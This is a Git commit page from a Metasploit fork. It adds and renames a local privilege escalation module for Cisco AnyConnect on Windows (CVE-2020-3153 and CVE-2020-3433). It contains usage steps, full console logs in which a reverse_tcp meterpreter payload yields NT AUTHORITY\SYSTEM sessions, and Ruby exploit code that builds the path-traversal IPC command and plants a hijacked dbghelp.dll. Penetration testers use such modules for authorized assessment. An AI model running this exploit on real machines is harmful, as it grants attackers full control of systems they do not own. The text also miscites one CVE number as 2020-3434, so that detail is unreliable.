dnrops
/
metasploit-framework
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity

Land #14187, Added CVE-2020-3433 module 

Merge branch 'land-14187' into upstream-master
This commit is contained in:
bwatters 2020-09-29 13:41:33 -05:00
parent d9b121b50d 81fd2ea8a8
commit 3aeeede4a6
No known key found for this signature in database
GPG Key ID: ECC0F0A52E65F268
3 changed files with 287 additions and 178 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

224
documentation/modules/exploit/windows/local/anyconnect_lpe.md Normal file
View File

@ -0,0 +1,224 @@
## Vulnerable Application
The installer component of Cisco AnyConnect Secure Mobility Client for Windows
prior to 4.8.02042 is vulnerable to path traversal and allows local attackers
to create/overwrite files in arbitrary locations with system level privileges.
The installer component of Cisco AnyConnect Secure Mobility Client for Windows
prior to 4.9.00086 is vulnerable to a DLL hijacking and allows local attackers
to execute code on the affected machine with with system level privileges.
Both attacks consist in sending a specially crafted IPC request to the TCP
port 62522 on the loopback device, which is exposed by the Cisco AnyConnect
Secure Mobility Agent service. This service will then launch the vulnerable
installer component (`vpndownloader`), which copies itself to an arbitrary
location (CVE-2020-3153) or with a supplied DLL (CVE-2020-3433) before being
executed with system privileges. Since `vpndownloader` is also vulnerable to DLL
hijacking, a specially crafted DLL (`dbghelp.dll`) is created at the same
location `vpndownloader` will be copied to get code execution with system
privileges.
The CVE-2020-3153 exploit has been successfully tested against Cisco AnyConnect
Secure Mobility Client versions 4.5.04029, 4.5.05030 and 4.7.04056 on Windows 10
version 1909 (x64) and Windows 7 SP1 (x86); the CVE-2020-3434 exploit has been
successfully tested against Cisco AnyConnect Secure Mobility Client versions
4.5.02036, 4.6.03049, 4.7.04056, 4.8.01090 and 4.8.03052 on Windows 10 version
1909 (x64) and 4.7.4056 on Windows 7 SP1 (x64).
AnyConnect Secure Mobility Client is not publicly available and only customers
with active contracts can download it. For this reason, download links have not
been provided.
## Install the Application
1. Unzip the AnyConnect package
2. Open the extracted folder
3. Run `Setup.exe`
4. Select `Core & VPN` only (no need to install the full package)
5. Click `Install Selected`
6. Confirm you want to install this specific version of Anyconnect (click `OK`)
7. Accept the EULA (click `Accept`)
8. `Installation complete` (click `OK`)... enjoy
Or just run the `anyconnect-win-x.y.zzzzz-core-vpn-predeploy-k9.msi` installer and
follow the installation steps with the default options.
## Verification Steps
1. Start msfconsole
2. Get a session with non-administrative privileges
3. Do: ```use exploit/windows/local/anyconnect_lpe```
4. Do: ```set SESSION <SESSION>```
5. Do: ```set payload windows/meterpreter/reverse_tcp```
6. Do: ```set LHOST <LHOST>```
7. Do: ```set LPORT <LPORT>```
8. Do: ```check```
9. Do: ```run```
10. You should get a new session as the SYSTEM user
## Options
### INSTALL_PATH
Set Cisco AnyConnect Secure Mobility Client installation path (where
`vpndownloader.exe`should be found). It will be automatically detectedif not set.
### CVE
Set the CVE to use (CVE-2020-3153 or CVE-2020-3433). Default: CVE-2020-3433.
### ForceExploit
Set this to `true` to override the `check` result during exploitation.
## Scenarios
### Windows 10 version 1909 (x64) with AnyConnect 4.8.3052 - CVE-2020-3433
```
msf5 exploit(windows/local/anyconnect_lpe) > set SESSION 1
SESSION => 1
msf5 exploit(windows/local/anyconnect_lpe) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(windows/local/anyconnect_lpe) > set lhost 192.168.1.24
lhost => 192.168.1.24
msf5 exploit(windows/local/anyconnect_lpe) > set lport 4445
lport => 4445
msf5 exploit(windows/local/anyconnect_lpe) > set verbose true
verbose => true
msf5 exploit(windows/local/anyconnect_lpe) > set CVE CVE-2020-3433
CVE => CVE-2020-3433
msf5 exploit(windows/local/anyconnect_lpe) > check
[*] Try to detect installation path...
[*] Found vpndownloader.exe path: 'C:\Program Files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client\vpndownloader.exe'
[*] The target appears to be vulnerable. Cisco AnyConnect version 4.8.3052.0.0 < 4.9.00086 (CVE-2020-3433).
msf5 exploit(windows/local/anyconnect_lpe) > run
[*] Started reverse TCP handler on 192.168.1.24:4445
[*] Try to detect installation path...
[*] Found vpndownloader.exe path: 'C:\Program Files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client\vpndownloader.exe'
[*] The target appears to be vulnerable. Cisco AnyConnect version 4.8.3052.0.0 < 4.9.00086 (CVE-2020-3433).
[*] "-ipc" argument needed
[*] Creating directory C:\Users\ATGO\AppData\Local\Temp\16Nkpr
[*] Meterpreter Session
[*] C:\Users\ATGO\AppData\Local\Temp\16Nkpr created
[*] Writing the payload to C:\Users\ATGO\AppData\Local\Temp\16Nkpr\dbghelp.dll
[*] IPC Command: "CAC-nc-install -ipc=76731 C:\Program Files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client\vpndownloader.exe C:\Users\ATGO\AppData\Local\Temp\16Nkpr\dbghelp.dll"
[*] Connecting to the AnyConnect agent on 127.0.0.1:62522
[*] Send the encoded IPC command (size = 288 bytes)
[*] Sending stage (176195 bytes) to 192.168.1.20
[*] Meterpreter session 3 opened (192.168.1.24:4445 -> 192.168.1.20:44712) at 2020-09-01 14:12:05 +0200
[+] Deleted C:\Users\ATGO\AppData\Local\Temp\16Nkpr\dbghelp.dll
[+] Deleted C:\Users\ATGO\AppData\Local\Temp\16Nkpr
[*] Shutdown the socket
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer : W
OS : Windows 10 (10.0 Build 18363).
Architecture : x64
System Language : fr_FR
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/windows
```
### Windows 7 SP1 with AnyConnect 4.7.4056 - CVE-2020-3153
```
msf5 exploit(windows/local/anyconnect_lpe) > set session 4
session => 4
msf5 exploit(windows/local/anyconnect_lpe) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(windows/local/anyconnect_lpe) > set lhost 192.168.1.24
lhost => 192.168.1.24
msf5 exploit(windows/local/anyconnect_lpe) > set lport 4445
lport => 4445
msf5 exploit(windows/local/anyconnect_lpe) > set verbose true
verbose => true
msf5 exploit(windows/local/anyconnect_lpe) > set cve CVE-2020-3153
cve => CVE-2020-3153
msf5 exploit(windows/local/anyconnect_lpe) > check
[*] Try to detect installation path...
[*] Found vpndownloader.exe path: 'C:\Program Files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client\vpndownloader.exe'
[*] The target appears to be vulnerable. Cisco AnyConnect version 4.7.4056.0.0 < 4.8.02042 (CVE-2020-3153 & CVE-2020-3433).
msf5 exploit(windows/local/anyconnect_lpe) > run
[*] Started reverse TCP handler on 192.168.1.24:4445
[*] Try to detect installation path...
[*] Found vpndownloader.exe path: 'C:\Program Files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client\vpndownloader.exe'
[*] The target appears to be vulnerable. Cisco AnyConnect version 4.7.4056.0.0 < 4.8.02042 (CVE-2020-3153 & CVE-2020-3433).
[*] "-ipc" argument needed
[*] Writing the payload to C:\ProgramData\Cisco\dbghelp.dll
[*] IPC Command: "CAC-nc-install -ipc=29278 C:\Program Files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client\iZnG\iZnG\iZnG\iZnG\../../../../vpndownloader.exe -"
[*] Connecting to the AnyConnect agent on 127.0.0.1:62522
[*] Send the encoded IPC command (size = 270 bytes)
[*] Sending stage (176195 bytes) to 192.168.1.20
[*] Meterpreter session 5 opened (192.168.1.24:4445 -> 192.168.1.20:45098) at 2020-09-01 14:23:13 +0200
[+] Deleted C:\ProgramData\Cisco\dbghelp.dll
[+] Deleted C:\ProgramData\Cisco\vpndownloader.exe
[*] Shutdown the socket
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer : ATGO-PC
OS : Windows 7 (6.1 Build 7601, Service Pack 1).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/windows
```
### Windows 7 SP1 with AnyConnect 4.7.4056 - CVE-2020-3433
```
msf5 exploit(windows/local/anyconnect_lpe) > set session 4
session => 4
msf5 exploit(windows/local/anyconnect_lpe) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(windows/local/anyconnect_lpe) > set lhost 192.168.1.24
lhost => 192.168.1.24
msf5 exploit(windows/local/anyconnect_lpe) > set lport 4445
lport => 4445
msf5 exploit(windows/local/anyconnect_lpe) > set verbose true
verbose => true
msf5 exploit(windows/local/anyconnect_lpe) > set cve CVE-2020-3433
cve => CVE-2020-3433
msf5 exploit(windows/local/anyconnect_lpe) > check
[*] Try to detect installation path...
[*] Found vpndownloader.exe path: 'C:\Program Files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client\vpndownloader.exe'
[*] The target appears to be vulnerable. Cisco AnyConnect version 4.7.4056.0.0 < 4.8.02042 (CVE-2020-3153 & CVE-2020-3433).
msf5 exploit(windows/local/anyconnect_lpe) > run
[*] Started reverse TCP handler on 192.168.1.24:4445
[*] Try to detect installation path...
[*] Found vpndownloader.exe path: 'C:\Program Files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client\vpndownloader.exe'
[*] The target appears to be vulnerable. Cisco AnyConnect version 4.7.4056.0.0 < 4.8.02042 (CVE-2020-3153 & CVE-2020-3433).
[*] "-ipc" argument needed
[*] Creating directory C:\Users\atgo\AppData\Local\Temp\fPTN4o
[*] Meterpreter Session
[*] C:\Users\atgo\AppData\Local\Temp\fPTN4o created
[*] Writing the payload to C:\Users\atgo\AppData\Local\Temp\fPTN4o\dbghelp.dll
[*] IPC Command: "CAC-nc-install -ipc=88243 C:\Program Files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client\vpndownloader.exe C:\Users\atgo\AppData\Local\Temp\fPTN4o\dbghelp.dll"
[*] Connecting to the AnyConnect agent on 127.0.0.1:62522
[*] Send the encoded IPC command (size = 288 bytes)
[*] Sending stage (176195 bytes) to 192.168.1.20
[*] Meterpreter session 6 opened (192.168.1.24:4445 -> 192.168.1.20:45102) at 2020-09-01 14:24:48 +0200
[+] Deleted C:\Users\atgo\AppData\Local\Temp\fPTN4o\dbghelp.dll
[+] Deleted C:\Users\atgo\AppData\Local\Temp\fPTN4o
[*] Shutdown the socket
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer : ATGO-PC
OS : Windows 7 (6.1 Build 7601, Service Pack 1).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/windows
meterpreter >
```

148
documentation/modules/exploit/windows/local/anyconnect_path_traversal_lpe.md
View File

@ -1,148 +0,0 @@
## Vulnerable Application
The installer component of Cisco AnyConnect Secure Mobility Client for Windows
prior to 4.8.02042 is vulnerable to path traversal and allows local attackers
to create/overwrite files in arbitrary locations as the SYSTEM user.
The attack consists of sending a specially crafted IPC request to the TCP port
62522 on the loopback device, which is exposed by the Cisco AnyConnect Secure
Mobility Agent service. This service will then launch the vulnerable installer
component (`vpndownloader`), which copies itself to an arbitrary location
before being executed as the SYSTEM user. Since `vpndownloader` is also
vulnerable to DLL hijacking, a specially crafted DLL (`dbghelp.dll`) is created
at the same location `vpndownloader` is copied to get code execution as the
SYSTEM user.
This exploit has been successfully tested against Cisco AnyConnect Secure
Mobility Client versions 4.5.04029, 4.5.05030 and 4.7.04056 on Windows 10
version 1909 (x64) and Windows 7 SP1 (x86).
AnyConnect Secure Mobility Client is not publicly available and only customers
with active contracts can download it. For this reason, download links have not
been provided.
## Install the Application
1. Unzip the AnyConnect package
2. Open the extracted folder
3. Run `Setup.exe`
4. Select `Core & VPN` only (no need to install the full package)
5. Click `Install Selected`
6. Confirm you want to install this specific version of Anyconnect (click `OK`)
7. Accept the EULA (click `Accept`)
8. `Installation complete` (click `OK`)... enjoy
Or just run the `anyconnect-win-x.y.zzzzz-core-vpn-predeploy-k9.msi` installer and
follow the installation steps with the default options.
## Verification Steps
1. Start msfconsole
2. Get a session with non-administrative privileges
3. Do: ```use exploit/windows/local/anyconnect_path_traversal_lpe```
4. Do: ```set SESSION <SESSION>```
5. Do: ```set payload windows/meterpreter/reverse_tcp```
6. Do: ```set LHOST <LHOST>```
7. Do: ```set LPORT <LPORT>```
8. Do: ```check```
9. Do: ```run```
10. You should get a new session as the SYSTEM user
## Options
### ForceExploit
Set this to `true` to override the `check` result during exploitation.
## Scenarios
### Windows 10 version 1909 (x64) with AnyConnect 4.7.4056
```
msf5 exploit(windows/local/anyconnect_path_traversal_lpe) > set SESSION 8
SESSION => 8
msf5 exploit(windows/local/anyconnect_path_traversal_lpe) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(windows/local/anyconnect_path_traversal_lpe) > set LHOST 172.16.60.1
LHOST => 172.16.60.1
msf5 exploit(windows/local/anyconnect_path_traversal_lpe) > set LPORT 4445
LPORT => 4445
msf5 exploit(windows/local/anyconnect_path_traversal_lpe) > set verbose true
verbose => true
msf5 exploit(windows/local/anyconnect_path_traversal_lpe) > check
[*] Found vpndownloader.exe path: 'C:\Program Files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client\vpndownloader.exe'
[+] Cisco AnyConnect version 4.7.4056.0.0 appears to be vulnerable
[*] The target appears to be vulnerable.
msf5 exploit(windows/local/anyconnect_path_traversal_lpe) > run
[*] Started reverse TCP handler on 172.16.60.1:4445
[*] Found vpndownloader.exe path: 'C:\Program Files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client\vpndownloader.exe'
[+] Cisco AnyConnect version 4.7.4056.0.0 appears to be vulnerable
[*] "-ipc" argument needed
[*] Writing the payload to C:\ProgramData\Cisco\dbghelp.dll
[*] IPC Command: "CAC-nc-install -ipc=18201 C:\Program Files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client\vphU\vphU\vphU\vphU\../../../../vpndownloader.exe -"
[*] Connecting to the AnyConnect agent on 127.0.0.1:62522
[*] Send the encoded IPC command (size = 270 bytes)
[*] Sending stage (176195 bytes) to 172.16.60.202
[*] Meterpreter session 9 opened (172.16.60.1:4445 -> 172.16.60.202:49765) at 2020-06-19 19:35:29 +0200
[+] Deleted C:\ProgramData\Cisco\dbghelp.dll
[+] Deleted C:\ProgramData\Cisco\vpndownloader.exe
[*] Shutdown the socket
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer : DESKTOP-UUQE0B4
OS : Windows 10 (10.0 Build 18363).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/windows
```
### Windows 7 SP1 (x86) with AnyConnect 4.5.5030
```
msf5 exploit(windows/local/anyconnect_path_traversal_lpe) > set SESSION 8
SESSION => 8
msf5 exploit(windows/local/anyconnect_path_traversal_lpe) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(windows/local/anyconnect_path_traversal_lpe) > set LHOST 172.16.60.1
LHOST => 172.16.60.1
msf5 exploit(windows/local/anyconnect_path_traversal_lpe) > set LPORT 4445
LPORT => 4445
msf5 exploit(windows/local/anyconnect_path_traversal_lpe) > set verbose true
verbose => true
msf5 exploit(windows/local/anyconnect_path_traversal_lpe) > check
[*] Found vpndownloader.exe path: 'C:\Program Files\Cisco\Cisco AnyConnect Secure Mobility Client\vpndownloader.exe'
[+] Cisco AnyConnect version 4.5.5030.0.0 appears to be vulnerable
[*] The target appears to be vulnerable.
msf5 exploit(windows/local/anyconnect_path_traversal_lpe) > run
[*] Started reverse TCP handler on 172.16.60.1:4445
[*] Found vpndownloader.exe path: 'C:\Program Files\Cisco\Cisco AnyConnect Secure Mobility Client\vpndownloader.exe'
[+] Cisco AnyConnect version 4.5.5030.0.0 appears to be vulnerable
[*] "-ipc" argument not needed
[*] Writing the payload to C:\ProgramData\Cisco\dbghelp.dll
[*] IPC Command: "CAC-nc-install C:\Program Files\Cisco\Cisco AnyConnect Secure Mobility Client\vphU\vphU\vphU\vphU\../../../../vpndownloader.exe -"
[*] Connecting to the AnyConnect agent on 127.0.0.1:62522
[*] Send the encoded IPC command (size = 247 bytes)
[*] Sending stage (176195 bytes) to 172.16.60.134
[*] Meterpreter session 10 opened (172.16.60.1:4445 -> 172.16.60.134:49218) at 2020-06-19 19:41:53 +0200
[+] Deleted C:\ProgramData\Cisco\dbghelp.dll
[+] Deleted C:\ProgramData\Cisco\vpndownloader.exe
[*] Shutdown the socket
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer : WIN7-DEV
OS : Windows 7 (6.1 Build 7601, Service Pack 1).
Architecture : x86
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/windows
```

93
modules/exploits/windows/local/anyconnect_path_traversal_lpe.rb → modules/exploits/windows/local/anyconnect_lpe.rb
View File

@ -16,31 +16,39 @@ class MetasploitModule < Msf::Exploit::Local
super(
update_info(
info,
'Name' => 'Cisco AnyConnect Priv Esc through Path Traversal',
'Name' => 'Cisco AnyConnect Privilege Escalations (CVE-2020-3153 and CVE-2020-3433)',
'Description' => %q{
The installer component of Cisco AnyConnect Secure Mobility Client for Windows
prior to 4.8.02042 is vulnerable to path traversal and allows local attackers
to create/overwrite files in arbitrary locations with system level privileges.
The attack consists in sending a specially crafted IPC request to the TCP port
62522 on the loopback device, which is exposed by the Cisco AnyConnect Secure
Mobility Agent service. This service will then launch the vulnerable installer
component (`vpndownloader`), which copies itself to an arbitrary location
before being executed with system privileges. Since `vpndownloader` is also
vulnerable to DLL hijacking, a specially crafted DLL (`dbghelp.dll`) is created
at the same location `vpndownloader` will be copied to get code execution with
system privileges.
The installer component of Cisco AnyConnect Secure Mobility Client for Windows
prior to 4.9.00086 is vulnerable to a DLL hijacking and allows local attackers
to execute code on the affected machine with with system level privileges.
This exploit has been successfully tested against Cisco AnyConnect Secure
Mobility Client versions 4.5.04029, 4.5.05030 and 4.7.04056 on Windows 10
version 1909 (x64) and Windows 7 SP1 (x86).
Both attacks consist in sending a specially crafted IPC request to the TCP
port 62522 on the loopback device, which is exposed by the Cisco AnyConnect
Secure Mobility Agent service. This service will then launch the vulnerable
installer component (`vpndownloader`), which copies itself to an arbitrary
location (CVE-2020-3153) or with a supplied DLL (CVE-2020-3433) before being
executed with system privileges. Since `vpndownloader` is also vulnerable to DLL
hijacking, a specially crafted DLL (`dbghelp.dll`) is created at the same
location `vpndownloader` will be copied to get code execution with system
privileges.
The CVE-2020-3153 exploit has been successfully tested against Cisco AnyConnect
Secure Mobility Client versions 4.5.04029, 4.5.05030 and 4.7.04056 on Windows 10
version 1909 (x64) and Windows 7 SP1 (x86); the CVE-2020-3434 exploit has been
successfully tested against Cisco AnyConnect Secure Mobility Client versions
4.5.02036, 4.6.03049, 4.7.04056, 4.8.01090 and 4.8.03052 on Windows 10 version
1909 (x64) and 4.7.4056 on Windows 7 SP1 (x64).
},
'License' => MSF_LICENSE,
'Author' =>
[
'Yorick Koster', # original PoC, analysis
'Antoine Goichot (ATGO)', # PoC
'Christophe De La Fuente' # msf module
'Yorick Koster', # original PoC CVE-2020-3153, analysis
'Antoine Goichot (ATGO)', # PoC CVE-2020-3153, original PoC for CVE-2020-3433, update of msf module
'Christophe De La Fuente' # msf module for CVE-2020-3153
],
'Platform' => 'win',
'Arch' => [ ARCH_X86, ARCH_X64 ],
@ -58,9 +66,11 @@ class MetasploitModule < Msf::Exploit::Local
[
['URL', 'https://ssd-disclosure.com/ssd-advisory-cisco-anyconnect-privilege-elevation-through-path-traversal/'],
['URL', 'https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ac-win-path-traverse-qO4HWBsj'],
['CVE', '2020-3153']
['CVE', '2020-3153'],
['URL', 'https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-anyconnect-dll-F26WwJW'],
['CVE', '2020-3433']
],
'DisclosureDate' => 'Feb 19 2020',
'DisclosureDate' => 'Aug 05 2020',
'DefaultTarget' => 0,
'DefaultOptions' => {
'PAYLOAD' => 'windows/meterpreter/reverse_tcp',
@ -74,7 +84,8 @@ class MetasploitModule < Msf::Exploit::Local
false,
'Cisco AnyConnect Secure Mobility Client installation path (where \'vpndownloader.exe\''\
' should be found). It will be automatically detected if not set.'
])
]),
OptEnum.new('CVE', [ true, 'Vulnerability to use', 'CVE-2020-3433', ['CVE-2020-3433', 'CVE-2020-3153']])
]
register_advanced_options [
@ -163,12 +174,19 @@ class MetasploitModule < Msf::Exploit::Local
return CheckCode.Unknown('Unable to retrieve vpndownloader.exe file version')
end
patched_version = Gem::Version.new('4.8.02042')
cve_2020_3153 = (datastore['CVE'] == 'CVE-2020-3153')
patched_version_cve_2020_3153 = Gem::Version.new('4.8.02042')
patched_version_cve_2020_3433 = Gem::Version.new('4.9.00086')
@ac_version = Gem::Version.new(version.join('.'))
if @ac_version < patched_version
return CheckCode.Appears("Cisco AnyConnect version #{@ac_version} < #{patched_version}.")
if @ac_version < patched_version_cve_2020_3153
return CheckCode.Appears("Cisco AnyConnect version #{@ac_version} < #{patched_version_cve_2020_3153} (CVE-2020-3153 & CVE-2020-3433).")
elsif (@ac_version < patched_version_cve_2020_3433) && !cve_2020_3153
return CheckCode.Appears("Cisco AnyConnect version #{@ac_version} < #{patched_version_cve_2020_3433} (CVE-2020-3433).")
elsif (@ac_version < patched_version_cve_2020_3433) && cve_2020_3153
return CheckCode.Safe("Cisco AnyConnect version #{@ac_version} >= #{patched_version_cve_2020_3153} (However CVE-2020-3433 can be used).")
else
return CheckCode.Safe("Cisco AnyConnect version #{@ac_version} >= #{patched_version}.")
return CheckCode.Safe("Cisco AnyConnect version #{@ac_version} >= #{patched_version_cve_2020_3433}.")
end
end
@ -198,8 +216,18 @@ class MetasploitModule < Msf::Exploit::Local
vprint_status('"-ipc" argument not needed')
end
program_data_path = get_env('ProgramData')
dbghelp_path = "#{program_data_path}\\Cisco\\dbghelp.dll"
cve_2020_3153 = (datastore['CVE'] == 'CVE-2020-3153')
if cve_2020_3153
program_data_path = get_env('ProgramData')
dbghelp_path = "#{program_data_path}\\Cisco\\dbghelp.dll"
else
temp_path = get_env('TEMP')
junk = Rex::Text.rand_text_alphanumeric(6)
temp_path << "\\#{junk}"
mkdir(temp_path)
dbghelp_path = "#{temp_path}\\dbghelp.dll"
end
print_status("Writing the payload to #{dbghelp_path}")
begin
@ -210,12 +238,17 @@ class MetasploitModule < Msf::Exploit::Local
fail_with(Failure::NotFound, e.message)
end
# vpndownloader.exe will be copied to "C:\ProgramData\Cisco\" (assuming the
# normal process will copy the file to
# "C:\ProgramData\Cisco\Cisco AnyConnect Secure Mobility Client\Temp\Installer\XXXX.tmp\")
register_file_for_cleanup("#{program_data_path}\\Cisco\\vpndownloader.exe")
junk = Rex::Text.rand_text_alphanumeric(4)
cac_cmd << "\t#{@installation_path}\\#{junk}\\#{junk}\\#{junk}\\#{junk}\\../../../../vpndownloader.exe\t-\""
if cve_2020_3153
# vpndownloader.exe will be copied to "C:\ProgramData\Cisco\" (assuming the
# normal process will copy the file to
# "C:\ProgramData\Cisco\Cisco AnyConnect Secure Mobility Client\Temp\Installer\XXXX.tmp\")
register_file_for_cleanup("#{program_data_path}\\Cisco\\vpndownloader.exe")
junk = Rex::Text.rand_text_alphanumeric(4)
cac_cmd << "\t#{@installation_path}\\#{junk}\\#{junk}\\#{junk}\\#{junk}\\../../../../vpndownloader.exe\t-\""
else
cac_cmd << "\t#{@installation_path}\\vpndownloader.exe\t#{dbghelp_path}\""
end
vprint_status("IPC Command: #{cac_cmd}")
cipc_msg = CIPCMessage.new